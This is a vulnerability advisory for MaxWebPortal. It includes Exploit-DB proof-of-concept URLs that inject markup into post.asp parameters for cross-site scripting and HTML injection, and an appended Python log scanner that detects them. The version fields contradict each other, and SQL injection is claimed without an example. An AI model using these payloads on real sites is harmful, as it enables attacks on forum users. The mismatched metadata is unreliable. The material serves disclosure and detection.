Vendor: MaxWebPortal
By: SecurityFocus
CVSS: 7.5 (HIGH)
Cross-site Scripting, SQL Injection and HTML Injection
CWE: 79, 89, 91
Product Name: MaxWebPortal
Affected Version From: 1.3.2005
Affected Version To: 1.3.2005
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

MaxWebPortal Multiple Remote Vulnerabilities

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to Cross-site Scripting, SQL Injection and HTML Injection attacks. Cross-site Scripting can be exploited by sending a maliciously crafted URL to the vulnerable application. HTML Injection can be exploited by sending a maliciously crafted URL containing an HTTP request to the vulnerable application. SQL Injection can be exploited by sending a maliciously crafted URL containing a SQL query to the vulnerable application.

Mitigation:

Input validation should be used to prevent malicious input from entering the system. It is also recommended to use a web application firewall to filter malicious input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13601/info

MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues. 

Cross-site Scripting:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>

HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>
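
A check for the request patterns listed above, written for reviewing web server logs. This is an added example, not part of the original advisory; the function names, the reason strings and the assumption that requests are available as `path?query` strings are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that appear in the advisory's example requests (lower-cased).
WATCHED = {"mod", "m", "type", "forum_title"}
MARKUP = re.compile(r'[<>"]')                           # can break out of an attribute
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)  # value starts with a URL

def check_request(target):
    """Return (parameter, reason) findings for one request target (path?query)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/post.asp"):
        return []
    findings = []
    # parse_qsl percent-decodes values, so encoded and raw forms are treated alike.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        key = name.strip().lower()
        if key not in WATCHED:
            continue
        if "\x00" in value:
            findings.append((key, "null byte"))
        if MARKUP.search(value):
            findings.append((key, "markup characters"))
        if key == "forum_title" and SCHEME.match(value):
            findings.append((key, "URL in title"))
    return findings

def scan(targets):
    """Map each flagged request target to its findings."""
    return {t: f for t in targets if (f := check_request(t))}

# Constructed sample request targets, percent-encoded as a client would send them.
SAMPLE = [
    "/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat",
    "/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=%00General+Chat&mod=%22%3E%3Cplaintext%3E",
    "/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=http://%3Cplaintext%3E",
    "/default.asp?mod=%3Cb%3E",
]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE).items():
        print(target, findings)
```

The same predicate can back server-side input validation for these parameters: reject the request when `check_request` returns any finding.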